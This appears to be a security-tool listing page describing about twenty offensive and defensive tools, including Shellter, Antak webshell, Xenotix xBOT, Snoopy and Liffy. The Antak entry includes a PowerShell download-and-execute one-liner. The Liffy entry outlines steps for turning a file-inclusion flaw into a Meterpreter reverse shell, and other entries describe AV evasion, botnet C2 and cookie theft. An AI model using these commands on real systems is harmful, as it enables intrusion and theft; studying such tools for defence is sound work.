Passive Spider - Information Gathering from Search Engine Tool

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.

INSTALL
git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing, refer to them for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.

ARGUMENTS

--domain   || -d    The domain you would like to use as a target.
--pages    || -p    The number of pages you would like to hit from the search engine. Default: 10
--all      || -a    Do all of the spidering checks. This is the default check.
--allpages          Find all pages related to the domain, limited by the --pages option.
--allfiles          Find all file types related to the domain, limited to the ones configured.
--neighbours        Find other domains that are on the same IP address.
--urlkeywords       Find page URLs that have 'interesting' keywords in them.
--keywords          Find page content that have 'interesting' keywords in them.
--export   || -e    Request URLs through proxy.
                    Specify a proxy (type://ip:port) or use defaults. Default: http://127.0.0.1:8080
--help     || -h    This output.

USAGE

- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours

Download Passive Spider

Read More

YASAT - Yet Another Stupid Audit Tool

YASAT (Yet Another Stupid Audit Tool) is a simple stupid audit tool.

Its goal is to be as simple as possible with minimum binary dependencies (only sed, grep and cut)

Second goal is to document each test with maximum information and links to official documentation. 

It do many tests for checking security configuration issue or others good practice. 

It checks many software configurations like: 

• Apache
• Bind DNS
• CUPS
• PHP
• kernel configuration
• mysql
• network configuration
• openvpn
• Packages update
• samba
• snmpd
• squid
• syslog
• tomcat
• user accounting
• vsftpd
• xinetd

YASAT is licensed under GPLv3

Download YASAT

Read More

HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files

HashMyFiles is small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. You can easily copy the MD5/SHA1 hashes list into the clipboard, or save them into text/html/xml file. 

HashMyFiles can also be launched from the context menu of Windows Explorer, and display the MD5/SHA1 hashes of the selected file or folder.

Using HashMyFiles

HashMyFiles doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file (HashMyFiles.exe). 

After you run it, you can add files and folders that you want to view their MD5/SHA1 hashes. You can do it by using the 'Add File' and 'Add Folder' options under the File menu, or simply by draging the files and folder from Explorer into the main window of HashMyFiles. 

After adding the desired files, you can copy the MD5/SHA1 hashes to the clipboard, or save the hashes list into text/html/xml file.

Download HashMyFiles

Read More

Shellter - A Dynamic ShellCode Injector

Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections, adding an extra section with RWE access,and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

Click here to read more.

Download Shellter

Read More

PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

PAExec lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. For example, you could launch CMD.EXE remotely and have the equivalent of a terminal session to the remote server. PAExec is useful for doing remote installs, checking remote configuration, etc.

PAExec - The Redistributable PsExec

Microsoft's PsExec tool (originally by SysInternal's Mark Russinovich) is a favorite of system administrators everywhere. It just has two tiny flaws:

1. PsExec can not be redistributed
2. Sensitive command-line options like username and passwords are sent as clear text

We needed something that would overcome those two issues, and not finding a suitable replacement, decided to write our own.

Examples

PAExec \\{server IP address} -s cmd.exe

Creates a telnet-like session on the remote server, running as Local System.

PAExec \\{server IP address} ipconfig

View network configuration on the remote server without needing to do an RDP session.

PAExec \\{server IP address} -u {username} -p {password} -i -c MyApp.exe

Copy MyApp.exe to the remote server and run it as {username} so that it shows up on the remote server.

Download PAExec

Read More

DarunGrim - A Patch Analysis and Binary Diffing Tool

DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality.

Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers.

This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers.

Download DarunGrim

Read More

XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation

XSSYA work by execute the payload encoded to bypass Web Application Firewall which is the first method request and response if it respond 200 it turn to Method 2 which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie

XSSYA Features

 * Support HTTPS

* After Confirmation (execute payload to get cookies)

* Can be run in (Windows - Linux)

* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)

*XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)

* Support Saving The Web HTML Code Before Executing

the Payload Viewing the Web HTML Code into the Screen or Terminal

Download XSSYA

Read More

Nosql-Exploitation-Framework - A FrameWork For NoSQL Scanning and Exploitation Framework

A FrameWork For NoSQL Scanning, Enumeration and Exploitation.

NoSQL Databases are schema less databases. They were invented to store data easily and flexibly.

NoSQL Databases have gained popularity and its security has always been under the scanner.

The NoSQL Exploitation Framework focuses scanning,enumerating and exploiting these databases.

The tool has support for over 5 databases MongoDB,CouchDB,Redis,H-Base and Cassandra.

Added Features:

• First Ever Tool With Added Support For Mongo,Couch,Redis,H-Base,Cassandra
• Support For NoSQL WebAPPS
• Added payload list for JS Injection,Web application Enumeration.
• Scan Support for Mongo,CouchDB and Redis
• Dictionary Attack Support for Mongo,Cocuh and Redis
• Enumeration Module added for the DB's,retrieves data in db's @ one shot.
• Currently Discover's Web Interface for Mongo
• Shodan Query Feature
• MultiThreaded IP List Scanner
• Dump and Copy Database features Added for CouchDB
• Sniff for Mongo,Couch and Redis

Installation

• Run chmod+x install.sh nosqlmap.py
• ./install.sh
• nosqlexp.py -h (For Help Options)

Sample Usage

• nosqlexp.py -ip localhost -scan
• nosqlexp.py -ip localhost -dict mongo -file b.txt
• nosqlexp.py -ip localhost -enum couch
• nosqlexp.py -ip localhost -enum redis
• nosqlexp.py -ip localhost -clone couch
• nosqlexp.py -ip localhost -webapp "web_app_link"

Download Nosql-Exploitation-Framework

Read More

Antak WebShell - A webshell which utilizes PowerShell

Antak is a webshell written in C#.Net which utilizes powershell. Antak is a part of Nishang and updates could be found here: https://github.com/samratashok/nishang

Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind while using commands (like changing current directory or running session aware scripts).

Executing PowerShell scripts on the target -

1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.

Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must mention the actual path on server (with write permissions) in command textbox. (OS temporary directory like C:\Windows\Temp may be writable.) Then use Browse and Upload buttons to upload file to that path.

Downloading a file - To download a file enter the actual path on the server in command textbox. Then click on Download button.

Main Features:

• Upload a file
• Download a file
• Executing Scripts
• Remoting/Pivoting

Download Antak WebShell

Read More

Moo0 File Monitor - Monitor file access easily

Moo0 File Monitor lets you easily monitor the file access activities on your system.

Have you ever wondered what's going on with your disk system behind your watch? Why the disk is busy? What's scratching your HDD? You may find them out using this simple program.

Download Moo0 File Monitor

Read More

OWASP Mantra Security Toolkit - Browser Based Security Framework

OWASP Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra is a browser especially designed for web application security testing. By having such a product, more people will come to know the easiness and flexibility of being able to follow basic testing procedures within the browser. Mantra believes that having such a portable, easy to use and yet powerful platform can be helpful for the industry.

Mantra has many built in tools to modify headers, manipulate input strings, replay GET/POST requests, edit cookies, quickly switch between multiple proxies, control forced redirects etc. This makes it a good software for performing basic security checks and sometimes, exploitation. Thus, Mantra can be used to solve basic levels of various web.

Mantra Provides

• A web application security testing framework built on top of a browser.
• Supports Windows, Linux(both 32 and 64 bit) and Macintosh.
• Can work with other software like ZAP using built in proxy management function which makes it much more convenient.
• Available in 9 languages: Arabic, Chinese – Simplified, Chinese – Traditional, English, French, Portuguese, Russian, Spanish and Turkish
• Comes installed with major security distributions including BackTrack and Matriux

Download OWASP Mantra

Read More

Xenotix xBOT - A Cross Platform PoC Bot that abuse certain Google Services to implement it's C&C

Xenotix xBOT is a proof of concept cross platform (Linux, Windows, Mac) bot written in Python that abuse certain Google Services to implement Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheet is abused to implement C2 for a bot network. The Google Forms can act as the C2 for a bot network. All the entries to the Google Form are send to an attached Spreadsheet. Here we can implement a bot that will listen to the Google Data API URL and extract the commands and later send back the response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and will parsed. For implementing the bot we will parse through the source, fetch the commands and do the corresponding operations. xBOT’s communication is encrypted as it uses Google’s own SSL connection and is nowhere affected by any firewalls as it works at Application layer. The botnet’s commands and responses are encrypted with SSL from Google Itself making it harder to sniff the bot’s communications in the network. It is a prototype bot with the bare minimum features of a Typical Bot. The intention of this tool is to give an idea about how Google API’s can be abused for Botnet Implementation.

xBOT COMMANDS

• xSYSINFO : Get System Information
• EXECUTE : Execute a passive system command
• xDOWNLOAD : Download a file from an URL
• xUPLOAD : Upload a file
• xNETWORK : Get network information
• xPORTSCAN : Run a Portscan
• xSCREENSHOT : Grab a Screenshot
• xKILL : Kill and Remove the xBOT.

Download Xenotix xBOT

Read More

Snoopy - A distributed tracking and data interception framework

Snoopy is a distributed tracking and profiling framework which can perform interesting tracking and profiling of mobile users through the use of WiFi.

There have been recent initiatives from numerous governments to legalise the monitoring of citizens’ Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism.

Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere. This inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data.

Snoopy consists of four components:

• Client software (aka Snoopy Drone software)
• Server software
• Web interface
• Maltego transforms

Plug-ins

Plug-ins consist of two parts:

• Back-end (data providing) part, written in Python
• Front-end (displaying) part, written in JavaScript (optional)

Requirements

• Ubuntu 12.04 LTS 32bit online server
• One or more Linux based client devices with internet connectivity and a WiFi device supporting injection drivers. We’d recommend the Nokia N900.
• A copy of Maltego Radium

Web Interface: You can access the web interface via http://yoursnoopyserver:5000/. You can write your own data exploration plugins. Check the Appendix of the README file for more info on that.

Download Snoopy

Read More

sb0x-project - A simple and Lightweight framework for Penetration testing

sb0x-project is A Lightweight Framework for PenTesting Written in Python

Platforms:

• Linux
• BSD
• "Or Unix System"

Download sb0x

Read More

Bing Heartbleed Scan - Tool to extract sites from a bing search and check if are vulnerables

A simple scan in bash to extract sites from a bing search and check if is vulnerable.

Download Bing Heartbleed Scan

Read More

ByWaf - Web Application Penetration Testing Framework

ByWaf is a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

The Bywaf application is built on Python’s built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers commandline editing with readline, including automatic tab completion of commands, command options and filenames.

Bywaf contains a sub-classed version of Cmd called Wafterpreter, which adds some important additions, including:

• Loading and selecting plugins.
• Getting and setting global and per-plugin options.
• Additional methods exposing functionality to the plugins.
• Backgrounding jobs, ending running jobs and querying job status.
• Loading scripts from the the command-line or within the interpreter.
• Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:

The Wafterpreter API encompasses methods used by both the plugins as well as the Wafterpreter’s own methods; this allows for plugins to refining its behavior by assigning their own methods in their place.

Utility methods are time-saving shortcuts; while the API methods are the preferred way to change the interpreter’s behavior and to perform queries for jobs.

• filename_completer(): a utility method and API that when given a set of starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. This parameters to this method are supplied to completion methods, which can in turn pass them to this method.
• get_job(): this utility method retrieves a Futures instace from the Wafterpreter’s internal list of completed and running jobs, given its job ID. This is useful in querying information about individual jobs (see do_kill() for an example).
• finished_job_callback(): This overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
• set_prompt(): an API method for setting the prompt to reflect a new plugin name.
• get_history_item(): an API method returning the command history.
• save_history(): an API method for saving the command history to a file.
• load_history(): an API method for loading the command history from a file.
• clear_history(): an API method for clearing the command history.
• load_module(): a private low-level method for loading modules. Gets called by do_use(). There should not be a reason for its use outside that method.

Download ByWaf

Read More

WebCookiesSniffer - Capture Web site cookies

WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Download WebCookiesSniffer

Read More

RCEer - Simple Remote Command Execution scanner

Simple Remote Command Execution scanner written in Python 2.7

Download RCEer

Read More

Bro - Passive Open-Source Network Traffic Analyzer

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.

Features

• Deployment
• Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
• Fully passive traffic analysis off a network tap or monitoring port.
• Standard libpcap interface for capturing packets.
• Real-time and offline analysis.
• Cluster-support for large-scale deployments.
• Unified management framework for operating both standalone and cluster setups.
• Open-source under a BSD license.
• Analysis
• Comprehensive logging of activity for offline analysis and forensics.
• Port-independent analysis of application-layer protocols.
• Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
• Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
• Comprehensive IPv6 support.
• Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
• Extensive sanity checks during protocol analysis.
• Support for IDS-style pattern matching.
• Scripting Language
• Turing-complete language for expression arbitrary analysis tasks.
• Event-based programming model.
• Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
• Extensive support for tracking and managing network state over time.
• Interfacing
• Default output to well-structured ASCII logs.
• Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
• Real-time integration of external input into analyses. Live database input in preparation.
• External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
• Ability to trigger arbitrary external processes from within the scripting language.

Download Bro

Read More

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database

SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.

Functions

• SQL Injection
• Operation System Function
• Dump Database
• Extract Database Schema
• Search Columns Name
• Read File (read only)
• Create File (read only)
• Brute Table & Column

Download Simple SQLi Dumper v5.1

Read More

Liffy - Local File Inclusion Exploitation Tool

Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.

Exploitation

Once you have found an local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.

./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python's HTTP web servers.

http-server /tmp -p 8000

If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.

msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should get see a new Meterpreter session spawn

curl --silent http://target/vuln/7ka0tqsq.php

Download Liffy

Read More